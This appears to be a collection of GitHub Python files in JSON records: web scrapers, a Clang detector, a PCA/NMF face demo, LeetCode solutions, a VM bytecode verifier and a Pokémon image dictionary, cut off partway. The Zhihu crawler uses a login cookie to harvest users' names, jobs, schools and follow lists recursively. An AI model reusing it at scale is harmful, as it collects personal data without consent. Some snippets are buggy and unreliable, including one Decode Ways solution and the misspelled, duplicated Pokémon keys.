+{"seq_id":"74494640103","text":"# -*- coding: utf-8 -*-\nimport requests\nfrom lxml import etree\nimport math\nimport json\nimport time\n\n\nclass Crawler(object):\n def get_page_html(self, url):\n \"\"\"\n 获取页面源码\n :param url:页面url\n :return: 页面源码\n \"\"\"\n if url:\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'\n '(KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36',\n 'cookie': 'cookie' # 这里填写你自己的登入的cookie\n }\n r = requests.get(url, headers=headers)\n print(\"正在获取{}的网页源码,状态码为{}\".format(url, r.status_code))\n # 爬取延时\n time.sleep(0.2)\n print(r.status_code)\n if r.status_code == 200:\n r.encoding = 'utf-8'\n return r.text\n return None\n\n def get_following_urls(self, userinfo_page_url, following_num):\n \"\"\"\n 根据用户主页拼接关注列表的url\n :param userinfo_page_url:\n :param following_num:\n :return:\n \"\"\"\n if not following_num:\n return None\n base_following_url = '/followees?include=data%5B*%5D.answer_count%2Carticles_count%2Cgender%2C' \\\n 'follower_count%2Cis_followed%2Cis_following%2Cbadge%5B%3F(type%3Dbest_answerer)%5' \\\n 'D.topics&offset={}&limit={}'\n page_nums = math.ceil(int(following_num.replace(',', '')) / 20)\n for i in range(int(page_nums)):\n following_url = userinfo_page_url.replace('people', 'api/v4/members') + base_following_url.format(i * 20, (\n i + 1) * 20)\n yield following_url\n\n def get_new_urls(self, following_json):\n \"\"\"\n 获取新的URL\n :param following_json:\n :return:\n \"\"\"\n if not following_json:\n return None\n # 解析返回的json数据\n base_url = 'https://www.zhihu.com'\n user_urls = []\n following_info_json = json.loads(following_json)\n items = following_info_json['data']\n for item in items:\n url_type = item['type']\n url_token = item['url_token']\n user_url = base_url + '/{}/{}'.format(url_type, url_token)\n print(\"爬取到新的用户链接:{}\".format(user_url))\n user_urls.append(user_url)\n return user_urls\n\n def get_userinfo(self, userinfo_url, user_page_html):\n \"\"\"\n 获取用户的详细信息\n :param userinfo_url:\n :param user_page_html:\n :return:\n \"\"\"\n if not user_page_html:\n return None\n print('正在爬取{}'.format(userinfo_url))\n user_page_html = etree.HTML(user_page_html)\n username = \"\".join(user_page_html.xpath('//span[@class=\"ProfileHeader-name\"]/text()'))\n follow_num = user_page_html.xpath(\n '//div[@class=\"NumberBoard FollowshipCard-counts NumberBoard--divider\"]//strong/text()')\n if not follow_num:\n return None\n following_num = follow_num[0]\n followers_num = follow_num[1]\n user_avatar_url = user_page_html.xpath('//img[@class=\"Avatar Avatar--large UserAvatar-inner\"]/@src')[0]\n userinfo_detail_items = user_page_html.xpath('//div[@class =\"ProfileHeader-infoItem\"]')\n if userinfo_detail_items:\n jobs = userinfo_detail_items[0].xpath('.//text()')\n if len(userinfo_detail_items) > 1:\n school = userinfo_detail_items[1].xpath('.//text()')\n else:\n school = []\n userinfo_detail = {\n 'jobs': jobs,\n 'school': school\n }\n else:\n userinfo_detail = []\n userinfo = {\n 'username': username,\n 'user_url': userinfo_url,\n 'following_num': following_num,\n 'followers_num': followers_num,\n 'user_avatar_url': user_avatar_url,\n 'userinfo_deail': userinfo_detail\n }\n print('爬取到用户信息:{}'.format(userinfo))\n return userinfo\n\n def main(self, userinfo_url):\n \"\"\"\n 主程序\n :param userinfo_url:\n :return:\n \"\"\"\n new_urls = []\n user_page_html = self.get_page_html(userinfo_url)\n if user_page_html:\n userinfo = self.get_userinfo(userinfo_url, user_page_html)\n if userinfo:\n following_urls = 
self.get_following_urls(userinfo_url, userinfo['following_num'])\n for following_url in following_urls:\n following_html = self.get_page_html(following_url)\n new_urls.extend(self.get_new_urls(following_html))\n return userinfo, new_urls\n return None, None\n\n\nif __name__ == '__main__':\n a = Crawler()\n a.main('https://www.zhihu.com/people/kmxz')\n","repo_name":"xieys/zhihu_spider","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":5001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"16009371781","text":"import re\nfrom utils.subprocess import get_output\n\n_command_candidate_patterns = ['clang(\\.exe)?$','clang-[A-Za-z0-9]*[0-9]+(\\.exe)?$', 'clang\\+\\+(\\.exe)?$', 'clang\\+\\+-[A-Za-z0-9]*[0-9]+(\\.exe)?$']\n_apple_llvm_pattern='Apple LLVM version ([0-9\\.]+)'\n_clangc2_pattern='clang with Microsoft CodeGen'\n_clang_version_pattern='clang version (\\d\\.\\d\\.\\d[^\\s]*)'\n\ndef _is_it_different_clang(output, patterns):\n for pattern in patterns:\n match = re.search(pattern, output)\n if match:\n return True\n return False\n\ndef _is_it_really_clang(command, patterns, out=None):\n for pattern in patterns:\n if re.search(pattern, command):\n output = get_output([command, \"--version\"])\n if not _is_it_different_clang(output, [_apple_llvm_pattern, _clangc2_pattern]):\n return True\n else:\n out.trace(\"[clng] {}: It is not vanilla Clang (e.g. Apple, or ClangC2). Aborting.\".format(command))\n return False\n\ndef _detect_clang_version(command, out=None):\n output = get_output([command, \"--version\"])\n match = re.search(_clang_version_pattern, output)\n if not match:\n out.warning(\"[clng] {}: could not find version string\".format(command))\n out.debug(\"[clng] {}: {}\".format(command, output))\n return \"unknown\"\n return match.group(1)\n\ndef _detect_clang(command, out=None):\n if not command:\n return None\n\n if not _is_it_really_clang(command, _command_candidate_patterns, out):\n if out:\n out.trace(\"[clng] {} is not Clang\".format(command))\n return None\n\n version=_detect_clang_version(command, out)\n out.info(\"[clng] {}: found Clang version {}\".format(command, version))\n\n options=[]\n meta = {\n \"tool\": \"clang\",\n \"path\": command,\n \"version\": version,\n \"options\": options\n }\n return meta\n\n\ndef run(command, out=None):\n ret = _detect_clang(command, out)\n if ret:\n return [ret]\n return None\n","repo_name":"unjello/findc","sub_path":"find_compiler/toolchain/matcher/clang/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"20550648548","text":"'''\nfit_transform(X):用X来训练PCA模型,同时返回降维后的数据。\ncomponents_不明白\n'''\nfrom numpy.random import RandomState\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_olivetti_faces\nfrom sklearn import decomposition\n\nn_row, n_col = 2, 3\nn_components = n_row * n_col\nimage_shape = (64, 64)\n\n###############################################################################\n# Load faces data\ndataset = fetch_olivetti_faces(shuffle=True, random_state=RandomState(0))\nfaces = dataset.data\n# (6,4096)\nprint(faces.shape)\n\n\n###############################################################################\ndef plot_gallery(title, images, n_col=n_col, n_row=n_row):\n # 子图 figsize(2*3,2.26*2) 生成图像的宽和长\n plt.figure(figsize=(2. * n_col, 2.26 * n_row))\n # 总图标题\n plt.suptitle(title, size=16)\n # 得到images 的序号和数据\n for i, comp in enumerate(images):\n # 第几个子图 subplot(2,3,1)\n plt.subplot(n_row, n_col, i + 1)\n vmax = max(comp.max(), -comp.min())\n # 显示子图,\n plt.imshow(comp.reshape(image_shape), cmap=plt.cm.gray,\n interpolation='nearest', vmin=-vmax, vmax=vmax)\n # 将子图的横纵坐标去掉\n plt.xticks(())\n plt.yticks(())\n plt.subplots_adjust(0.01, 0.05, 0.99, 0.94, 0.04, 0.)\n\n\nplot_gallery(\"First centered Olivetti faces\", faces[:n_components])\n###############################################################################\n\nestimators = [\n ('Eigenfaces - PCA using randomized SVD',\n decomposition.PCA(n_components=6, whiten=True)),\n\n ('Non-negative components - NMF',\n decomposition.NMF(n_components=6, init='nndsvda', tol=5e-3))\n]\n\n###############################################################################\n\nfor name, estimator in estimators:\n print(\"Extracting the top %d %s...\" % (n_components, name))\n print(faces.shape)\n estimator.fit(faces)\n # 是W\n components_ = estimator.components_\n print('components_[:6].shape:')\n print(components_[:6].shape)\n # print(components_[:,n_components].shape)\n plot_gallery(name, components_[:n_components])\n\n# plt.show()\n","repo_name":"dpp1013/Sklearn_ML","sub_path":"NMF.py","file_name":"NMF.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"72170636585","text":"import requests\nfrom lxml import etree\nimport re\n\nurl = \"https://ssr1.scrape.center\"\nhtml = requests.get(url).text\n\n\nroot = etree.HTML(html)\n\nxpath = \"//img/@src\"\nimgs = root.xpath(xpath)\n\ni = 1\nfor imgPlace in imgs:\n if re.match(\"^h.*\", str(imgPlace)):\n print(imgPlace)\n response = requests.get(imgPlace)\n print(response.content)\n # 将图片内容保存到本地文件\n with open(\"../data/imgdata/SSR1_{}.jpg\".format(i), \"wb\") as f:\n f.write(response.content)\n print(\"图片已保存\")\n i += 1\n\n","repo_name":"cumin1/SpiderStudyCode","sub_path":"xpath_mate/SSR1.py","file_name":"SSR1.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"3458633407","text":"class Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n dic = {} # '1'-> a\n for i in range(1, 27):\n dic[str(i)] = chr( i + ord('a') )\n\n f = [[ 0 for j in range(2)] for i in range(len(s) + 1)]\n for i in range( 1, len(s) + 1 ):\n if i == 1:\n f[i][0] = 1 if s[i - 1] in dic else 0\n else:\n if s[i-1:i] in dic:\n f[i][0] = max(f[i-1][0], f[i-1][1])\n if s[i-2:i] in dic:\n f[i][1] = max(f[i-2][0], f[i-2][1])\n\n\n return f[-1]\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 1\n f = [0] * len(s)\n\n dic = {} # '1'-> a\n for i in range(1, 27):\n dic[str(i)] = chr(i + ord('a'))\n\n f = [0] * (len(s) + 1)\n f[0] = 1\n\n for i in range(1, len(s) + 1):\n f[i] = 0\n if ord('1') <= ord(s[i-1]) and ord(s[i-1]) <= ord('9'):\n f[i] += f[i - 1]\n\n if i > 1:\n j = 10 * ( ord(s[i-2]) - ord('0') ) + ord(s[i-1]) - ord('0')\n if 10 <= j and j <= 26:\n f[i] += f[i - 2]\n\n return f[-1]\n\n\nclass Solution(object):\n def numDecodings(self, s):\n \"\"\"\n 转移方程:\n 对于一个digit满足1-9时,f[i] = f[i-1]\n 对于连续的两个字母满足10-24时, f[i] = f[i-1] + f[i-2]\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n\n f = [0] * (len(s) + 1)\n\n f[0] = 1 #创建这个初始条件,主要是因为方便转移方程\n for i in range(1, len(s) + 1):\n temp = ord(s[i-1]) - ord('0')\n if temp > 0 and temp < 10:\n f[i] = f[i-1]\n if i > 1:\n temp = 10 * ( ord(s[i-2]) - ord('0') ) + ( ord(s[i-1]) - ord('0') )\n if 10 <= temp and temp <= 26:\n f[i] += f[i - 2]\n\n return f[-1]\n\n\n\n\nif __name__ == '__main__':\n # s = \"12\"\n # s = \"226\"\n # s = \"0\"\n # s = \"012\"\n # s = \"1\"\n s = \"10\"\n\n\n print(Solution().numDecodings(s))\n","repo_name":"pi408637535/Algorithm","sub_path":"com/study/algorithm/daily/91. Decode Ways.py","file_name":"91. Decode Ways.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"3184471231","text":"# -*- coding: utf8 -*-\n\nfrom ..instructions import InsReturn, InsGoto, InsBranch\nfrom .. import opcodes\nfrom ..exceptions import VerifyException\nfrom .frame import Frame\nfrom .controlflow import ControlFlowAnalyzer\n\n\nclass Verifier():\n\n def __init__(self, interpreter):\n self.interpreter = interpreter\n self.changed = None\n self.frames = None\n self.queue = []\n self.method = None\n\n def verify(self, method):\n self.verify_jump_points(method)\n self.verify_load_store_vars(method)\n self.verify_return(method)\n self.verify_values(method)\n return True\n\n def verify_jump_points(self, method):\n for i, inst in enumerate(method.code):\n if inst.opcode == opcodes.GOTO or isinstance(inst, InsBranch):\n if inst.argument.value < 0 or inst.argument.value >= len(method.code):\n raise VerifyException('instruction %s jump target %s outside boundary <0, %s>' %\n (inst, inst.argument.value, len(method.code) - 1))\n return True\n\n def verify_load_store_vars(self, method):\n for inst in method.code:\n if inst.opcode in [opcodes.ISTORE, opcodes.FSTORE, opcodes.ASTORE]:\n pos = inst.argument.value\n lv = method.variables[pos]\n vt = self.interpreter.new_value(lv.vtype)\n self.interpreter.copy_operation(inst, vt)\n return True\n\n def verify_return(self, method):\n cfa = ControlFlowAnalyzer()\n bbs = cfa.analyze(method)\n for bb in bbs:\n end_ins = method.code[bb.end_inst_index]\n if not bb.sucessors and not isinstance(end_ins, InsReturn):\n raise VerifyException('leaf basic block does not end with return instruction, but wirh %s' % end_ins)\n return True\n\n def verify_values(self, method):\n self.method = method\n self.changed = [False for _ in method.code]\n self.frames = [None for _ in method.code]\n\n current = Frame()\n current.set_return(self.interpreter.new_value(method.return_type.vtype))\n\n for i, v in enumerate(method.variables):\n if i < method.argument_count:\n current.add_local(self.interpreter.new_value(v.vtype))\n else:\n current.add_local(self.interpreter.new_value(None))\n current.add_local_type(self.interpreter.new_value(v.vtype))\n\n self.merge(0, current)\n\n while self.queue:\n ins_int = self.queue.pop()\n ins = method.code[ins_int]\n frame = self.frames[ins_int]\n self.changed[ins_int] = False\n\n current = frame.copy()\n current.execute(ins, self.interpreter)\n if not isinstance(ins, InsReturn) and not isinstance(ins, InsGoto):\n self.merge(ins_int + 1, current)\n\n if isinstance(ins, InsGoto) or isinstance(ins, InsBranch):\n self.merge(ins.argument.value, current)\n\n return True\n\n def merge(self, i, frame):\n old_frame = self.frames[i]\n changes = False\n\n if old_frame is None:\n self.frames[i] = frame.copy()\n changes = True\n else:\n changes = old_frame.merge(frame, self.interpreter)\n\n if changes and not self.changed[i]:\n self.changed[i] = True\n self.queue.append(i)\n","repo_name":"lukleh/Tiny-Stackbased-Virtual-Machine-in-Python","sub_path":"TSBVMIP/analysis/verifier.py","file_name":"verifier.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"}
+{"seq_id":"26771792719","text":"import requests\nfrom fake_useragent import UserAgent\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n\ndef link():\n url = 'https://kugoo-samokat.ru/elektrosamokat-kugoo-s3#!/tab/333312074-2'\n res = requests.get(url, headers={'User-Agent': UserAgent().chrome})\n html = res.content\n soup = BeautifulSoup(html, 'html.parser')\n name = soup.find('h1', attrs={'class': 'js-product-name'}).text\n\n d = {\n 'Категория': 'Электросамокаты',\n 'Цвет': 'черный',\n 'Бренд': 'Kugoo',\n 'Пол': '',\n 'Название': soup.find('h1', attrs={'class': 'js-product-name'}).text,\n 'Артикул товара': '0001',\n 'Баркод товара': '0001',\n 'Цена': soup.find('div', attrs={'class': 't762__price-value'}).text,\n 'Состав': '',\n 'Описание': '',\n 'Гарантийный срок': '1 год',\n 'Время зарядки': soup.find('div', attrs={'field': 'tn_text_1610137288297'}).text,\n 'Максимальная скорость': soup.find('div', attrs={'field': 'tn_text_1610130533629'}).text,\n 'Питание': 'от аккумулятора'\n }\n z = pd.DataFrame(d, index=[0])\n z.to_excel('name.xlsx')\n\n\nif __name__ == \"__main__\":\n link()\n","repo_name":"eugenerush/parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"358669428","text":"poke_names = {\n\n \"Bulbasaur\" : \"1.png\",\n \"Ivysaur\" : \"2.png\",\n \"Vensaur\" : \"3.png\",\n \"Charmander\": \"4.png\",\n \"Charmeleon\": \"5.png\",\n \"Charizard\" : \"6.png\",\n \"Squirtle\" : \"7.png\",\n \"Wartortle\" : \"8.png\",\n \"Blastoise\" : \"9.png\",\n \"Caterpie\" : \"10.png\",\n \"Metapod\" : \"11.png\",\n \"Butterfree\": \"12.png\",\n \"Weedle\" : \"13.png\",\n \"Kakuna\" : \"14.png\",\n \"Beedrill\" : \"15.png\",\n \"Pidgey\" : \"16.png\",\n \"Pidgeotto\" : \"17.png\",\n \"Pidgeot\" : \"18.png\",\n \"Rattata\" : \"19.png\",\n \"Raticate\" : \"20.png\",\n \"Spearow\" : \"21.png\",\n \"Fearow\" : \"22.png\",\n \"Ekans\" : \"23.png\",\n \"Arbok\" : \"24.png\",\n \"Pikachu\" : \"25.png\",\n \"Raichu\" : \"26.png\",\n \"Sandshrew\" : \"27.png\",\n \"Sandslash\" : \"28.png\",\n \"Nidoran F\" : \"29.png\",\n \"Nidorina\" : \"30.png\",\n \"Nidoqueen\" : \"31.png\",\n \"Nidoran M\" : \"32.png\",\n \"Nidorino\" : \"33.png\",\n \"Nidoking\" : \"34.png\",\n \"Clefairy\" : \"35.png\",\n \"Clefable\" : \"36.png\",\n \"Vulpix\" : \"37.png\",\n \"Ninetales\" : \"38.png\",\n \"Jigglypuff\": \"39.png\",\n \"Wigglytuff\": \"40.png\",\n \"Zubat\" : \"41.png\",\n \"Golbat\" : \"42.png\",\n \"Oddish\" : \"43.png\",\n \"Gloom\" : \"44.png\",\n \"Vileplume\" : \"45.png\",\n \"Paras\" : \"46.png\",\n \"Parasect\" : \"47.png\",\n \"Venonat\" : \"48.png\",\n \"Venomoth\" : \"49.png\",\n \"Diglett\" : \"50.png\",\n \"Dugtrio\" : \"51.png\",\n \"Meowth\" : \"52.png\",\n \"Persian\" : \"53.png\",\n \"Psyduck\" : \"54.png\",\n \"Golduck\" : \"55.png\",\n \"Mankey\" : \"56.png\",\n \"Primeape\" : \"57.png\",\n \"Growlithe\" : \"58.png\",\n \"Arcanine\" : \"59.png\",\n \"Poliwag\" : \"60.png\",\n \"Poliwhirl\" : \"61.png\",\n \"Poliwrath\" : \"62.png\",\n \"Abra\" : \"63.png\",\n \"Kadabra\" : \"64.png\",\n \"Alakazam\" : \"65.png\",\n \"Machop\" : \"66.png\",\n \"Machoke\" : \"67.png\",\n \"Machamp\" : \"68.png\",\n \"Bellsprout\": \"69.png\",\n \"Weepinbell\": \"70.png\",\n \"Victreebel\": \"71.png\",\n \"Tentacool\" : \"72.png\",\n \"Tentacruel\": \"73.png\",\n \"Geodude\" : \"74.png\",\n \"Graveler\" : \"75.png\",\n \"Golem\" : \"76.png\",\n \"Ponyta\" : \"77.png\",\n \"Rapidash\" : \"78.png\",\n \"Slowpoke\" : \"79.png\",\n \"Slowbro\" : \"80.png\",\n \"Magnemite\" : \"81.png\",\n \"Magneton\" : \"82.png\",\n \"Farfetch'd\": \"83.png\",\n \"Doduo\" : \"84.png\",\n \"Dodrio\" : \"85.png\",\n \"Seel\" : \"86.png\",\n \"Dewgong\" : \"87.png\",\n \"Grimer\" : \"88.png\",\n \"Muk\" : \"89.png\",\n \"Shellder\" : \"90.png\",\n \"Cloyster\" : \"91.png\",\n \"Gastly\" : \"92.png\",\n \"Haunter\" : \"93.png\",\n \"Gengar\" : \"94.png\",\n \"Onix\" : \"95.png\",\n \"Drowzee\" : \"96.png\",\n \"Hypno\" : \"97.png\",\n \"Krabby\" : \"98.png\",\n \"Kingler\" : \"99.png\",\n \"Voltorb\" : \"100.png\",\n \"Electrode\" : \"101.png\",\n \"Exeggcute\" : \"102.png\",\n \"Exeggutor\" : \"103.png\",\n \"Cubone\" : \"104.png\",\n \"Marowak\" : \"105.png\",\n \"Hitmonlee\" : \"106.png\",\n \"Hitmonchan\": \"107.png\",\n \"Lickitung\" : \"108.png\",\n \"Koffing\" : \"109.png\",\n \"Weezing\" : \"110.png\",\n \"Rhyhorn\" : \"111.png\",\n \"Rhydon\" : \"112.png\",\n \"Chansey\" : \"113.png\",\n \"Tangela\" : \"114.png\",\n \"Kangaskhan\": \"115.png\",\n \"Horsea\" : \"116.png\",\n \"Seadra\" : \"117.png\",\n \"Goldeen\" : \"118.png\",\n \"Seaking\" : \"119.png\",\n \"Staryu\" : \"120.png\",\n \"Starmie\" : \"121.png\",\n \"Mr. 
Mime\" : \"122.png\",\n \"Scyther\" : \"123.png\",\n \"Jynx\" : \"124.png\",\n \"Electabuzz\": \"125.png\",\n \"Magmar\" : \"126.png\",\n \"Pinsir\" : \"127.png\",\n \"Tauros\" : \"128.png\",\n \"Magikarp\" : \"129.png\",\n \"Gyarados\" : \"130.png\",\n \"Lapras\" : \"131.png\",\n \"Ditto\" : \"132.png\",\n \"Eevee\" : \"133.png\",\n \"Vaporeon\" : \"134.png\",\n \"Jolteon\" : \"135.png\",\n \"Flareon\" : \"136.png\",\n \"Porygon\" : \"137.png\",\n \"Omanyte\" : \"138.png\",\n \"Omastar\" : \"139.png\",\n \"Kabuto\" : \"140.png\",\n \"Kabutops\" : \"141.png\",\n \"Aerodactyl\": \"142.png\",\n \"Snorlax\" : \"143.png\",\n \"Articuno\" : \"144.png\",\n \"Zapdos\" : \"145.png\",\n \"Moltres\" : \"146.png\",\n \"Dratini\" : \"147.png\",\n \"Dragonair\" : \"148.png\",\n \"Dragonite\" : \"149.png\",\n \"Mewtwo\" : \"150.png\",\n \"Mew\" : \"151.png\",\n \"Chikorita\" : \"152.png\",\n \"Bayleef\" : \"153.png\",\n \"Meganium\" : \"154.png\",\n \"Cyndaquil\" : \"155.png\",\n \"Quilava\" : \"156.png\",\n \"Typhlosion\": \"157.png\",\n \"Totodile\" : \"158.png\",\n \"Feraligatr\": \"159.png\",\n \"Sentret\" : \"160.png\",\n \"Furret\" : \"161.png\",\n \"Hoothoot\" : \"162.png\",\n \"Noctowl\" : \"163.png\",\n \"Ledyba\" : \"164.png\",\n \"Ledian\" : \"165.png\",\n \"Spinarak\" : \"166.png\",\n \"Ariados\" : \"167.png\",\n \"Ariados\" : \"168.png\",\n \"Crobat\" : \"169.png\",\n \"Chinchou\" : \"170.png\",\n \"Lanturn\" : \"171.png\",\n \"Pichu\" : \"172.png\",\n \"Cleffa\" : \"173.png\",\n \"Igglybuff\" : \"174.png\",\n \"Togepi\" : \"175.png\",\n \"Togetic\" : \"176.png\",\n \"Natu\" : \"177.png\",\n \"Xatu\" : \"178.png\",\n \"Mareep\" : \"179.png\",\n \"Flaaffy\" : \"180.png\",\n \"Ampharos\" : \"181.png\",\n \"Bellossom\" : \"182.png\",\n \"Marill\" : \"183.png\",\n \"Azumarill\" : \"184.png\",\n \"Sudowoodo\" : \"185.png\",\n \"Politoed\" : \"186.png\",\n \"Hoppip\" : \"187.png\",\n \"Skiploom\" : \"188.png\",\n \"Jumpluff\" : \"189.png\",\n \"Aipom\" : \"190.png\",\n \"Sunkern\" : \"191.png\",\n \"Sunflora\" : \"192.png\",\n \"Yanma\" : \"193.png\",\n \"Wooper\" : \"194.png\",\n \"Quagsire\" : \"195.png\",\n \"Espeon\" : \"196.png\",\n \"Umbreon\" : \"197.png\",\n \"Murkrow\" : \"198.png\",\n \"Slowking\" : \"199.png\",\n \"misdreavus\": \"200.png\",\n \"Unown\" : \"201.png\",\n \"Wobbuffet\" : \"202.png\",\n \"Girafarig\" : \"203.png\",\n \"Pineco\" : \"204.png\",\n \"Forretress\": \"205.png\",\n \"Dunsparce\" : \"206.png\",\n \"Gligar\" : \"207.png\",\n \"Steelix\" : \"208.png\",\n \"Snubbull\" : \"209.png\",\n \"Granbull\" : \"210.png\",\n \"Qwilfish\" : \"211.png\",\n \"Scizor\" : \"212.png\",\n \"Shuckle\" : \"213.png\",\n \"Heracross\" : \"214.png\",\n \"Sneasel\" : \"215.png\",\n \"Teddiursa\" : \"216.png\",\n \"Ursaring\" : \"217.png\",\n \"Slugma\" : \"218.png\",\n \"Magcargo\" : \"219.png\",\n \"Swinub\" : \"220.png\",\n \"Piloswine\" : \"221.png\",\n \"Corsola\" : \"222.png\",\n \"Remoraid\" : \"223.png\",\n \"Octillery\" : \"224.png\",\n \"Delibird\" : \"225.png\",\n \"Mantine\" : \"226.png\",\n \"Skarmory\" : \"227.png\",\n \"Houndour\" : \"228.png\",\n \"Houndoom\" : \"229.png\",\n \"Kingdra\" : \"230.png\",\n \"Phanpy\" : \"231.png\",\n \"Donphan\" : \"232.png\",\n \"Porygon2\" : \"233.png\",\n \"Stantler\" : \"234.png\",\n \"Smeargle\" : \"235.png\",\n \"Tyrouge\" : \"236.png\",\n \"Hitmontop\" : \"237.png\",\n \"Smoochum\" : \"238.png\",\n \"Elekid\" : \"239.png\",\n \"Magby\" : \"240.png\",\n \"Miltank\" : \"241.png\",\n \"Blissey\" : \"242.png\",\n \"Raikou\" : \"243.png\",\n 
\"Entei\" : \"244.png\",\n \"Suicune\" : \"245.png\",\n \"Lavitar\" : \"246.png\",\n \"Pupitar\" : \"247.png\",\n \"Tyranitar\" : \"248.png\",\n \"Lugia\" : \"249.png\",\n \"Ho-Oh\" : \"250.png\",\n \"Celebi\" : \"251.png\",\n \"Treecko\" : \"252.png\",\n \"Grovyle\" : \"253.png\",\n \"Sceptile\" : \"254.png\",\n \"Torchic\" : \"255.png\",\n \"Combusken\" : \"256.png\",\n \"Blaziken\" : \"257.png\",\n \"Mudkip\" : \"258.png\",\n \"Marshtomp\" : \"259.png\",\n \"Swampert\" : \"260.png\",\n \"Poochyena\" : \"261.png\",\n \"Mightyena\" : \"262.png\",\n \"Zigzagoon\" : \"263.png\",\n \"Linoone\" : \"264.png\",\n \"Wurmple\" : \"265.png\",\n \"Silcoon\" : \"266.png\",\n \"Beautifly\" : \"267.png\",\n \"Cascoon\" : \"268.png\",\n \"Dustox\" : \"269.png\",\n \"Lotad\" : \"270.png\",\n \"Lombre\" : \"271.png\",\n \"Ludicolo\" : \"272.png\",\n \"Seedot\" : \"273.png\",\n \"Nuzleaf\" : \"274.png\",\n \"Shiftry\" : \"275.png\",\n \"Taillow\" : \"276.png\",\n \"Swellow\" : \"277.png\",\n \"Wingull\" : \"278.png\",\n \"Pelipper\" : \"279.png\",\n \"Ralts\" : \"280.png\",\n \"Kirlia\" : \"281.png\",\n \"Gardevoir\" : \"282.png\",\n \"Surskit\" : \"283.png\",\n \"Masquerain\" : \"284.png\",\n \"Shroomish\" : \"285.png\",\n \"Breloom\" : \"286.png\",\n \"Slakoth\" : \"287.png\",\n \"Vigoroth\" : \"288.png\",\n \"Slaking\" : \"289.png\",\n \"Nincada\" : \"290.png\",\n \"Ninjask\" : \"291.png\",\n \"Shedinja\" : \"292.png\",\n \"Whismur\" : \"293.png\",\n \"Loudred\" : \"294.png\",\n \"Exploud\" : \"295.png\",\n \"Makuhita\" : \"296.png\",\n \"Hariyama\" : \"297.png\",\n \"Azurill\" : \"298.png\",\n \"Nosepass\" : \"299.png\",\n \"Skitty\" : \"300.png\",\n \"Delcatty\" : \"301.png\",\n \"Sableye\" : \"302.png\",\n \"Mawile\" : \"303.png\",\n \"Aron\" : \"304.png\",\n \"Lairon\" : \"305.png\",\n \"Aggron\" : \"306.png\",\n \"Meditite\" : \"307.png\",\n \"Medicham\" : \"308.png\",\n \"Electrike\" : \"309.png\",\n \"Manectric\" : \"310.png\",\n \"Plusle\" : \"311.png\",\n \"Minum\" : \"312.png\",\n \"Volbeat\" : \"313.png\",\n \"Illumise\" : \"314.png\",\n \"Roselia\" : \"315.png\",\n \"Gulpin\" : \"316.png\",\n \"Swalot\" : \"317.png\",\n \"Carvanha\" : \"318.png\",\n \"Sharpedo\" : \"319.png\",\n \"Wailmer\" : \"320.png\",\n \"Wailord\" : \"321.png\",\n \"Numel\" : \"322.png\",\n \"Camerupt\" : \"323.png\",\n \"Torkoal\" : \"324.png\",\n \"Spoink\" : \"325.png\",\n \"Grumpig\" : \"326.png\",\n \"Spinda\" : \"327.png\",\n \"Trapinch\" : \"328.png\",\n \"Vibrava\" : \"329.png\",\n \"Flygon\" : \"330.png\",\n \"Cacnea\" : \"331.png\",\n \"Cacturne\" : \"332.png\",\n \"Swablu\" : \"333.png\",\n \"Altaria\" : \"334.png\",\n \"Zangoose\" : \"335.png\",\n \"Seviper\" : \"336.png\",\n \"Lunatone\" : \"337.png\",\n \"Solrock\" : \"338.png\",\n \"Barboach\" : \"339.png\",\n \"Wiscash\" : \"340.png\",\n \"Corphish\" : \"341.png\",\n \"Crawdaunt\" : \"342.png\",\n \"Baltoy\" : \"343.png\",\n \"Claydol\" : \"344.png\",\n \"Lileep\" : \"345.png\",\n \"Cradily\" : \"346.png\",\n \"Anorith\" : \"347.png\",\n \"Armaldo\" : \"348.png\",\n \"Feebas\" : \"349.png\",\n \"Milotic\" : \"350.png\",\n \"Castform\" : \"351.png\",\n \"Kecleon\" : \"352.png\",\n \"Shuppet\" : \"353.png\",\n \"Banette\" : \"354.png\",\n \"Duskull\" : \"355.png\",\n \"Dusclops\" : \"356.png\",\n \"Tropius\" : \"357.png\",\n \"Chimecho\" : \"358.png\",\n \"Absol\" : \"359.png\",\n \"Wynaut\" : \"360.png\",\n \"Snorunt\" : \"361.png\",\n \"Glalie\" : \"362.png\",\n \"Spheal\" : \"363.png\",\n \"Sealeo\" : \"364.png\",\n \"Walrein\" : \"365.png\",\n 
